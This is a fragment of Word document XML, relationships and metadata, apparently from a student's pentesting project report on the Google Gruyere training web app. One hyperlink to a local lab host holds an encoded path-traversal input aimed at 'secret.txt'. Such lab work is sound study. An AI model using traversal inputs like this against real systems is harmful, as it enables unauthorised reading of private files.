Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image274.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/627840037480778722812315839194576695652" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/484345658214029200767271373289240266932/..%2fsecret.txt" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId251"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de prueba de pentesting a la aplicación web Google Gruy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7FF5D-6F0E-4E5B-B413-AB412563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86</Pages>
  <Words>16446</Words>
  <Characters>90454</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Proyecto 1ª evaluación</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10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1ª evaluación</dc:title>
  <dc:subject/>
  <dc:creator>Alesander Martinez Seijo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alesander Martinez</cp:lastModifiedBy>
  <cp:revision>184</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-19T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-28T06:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>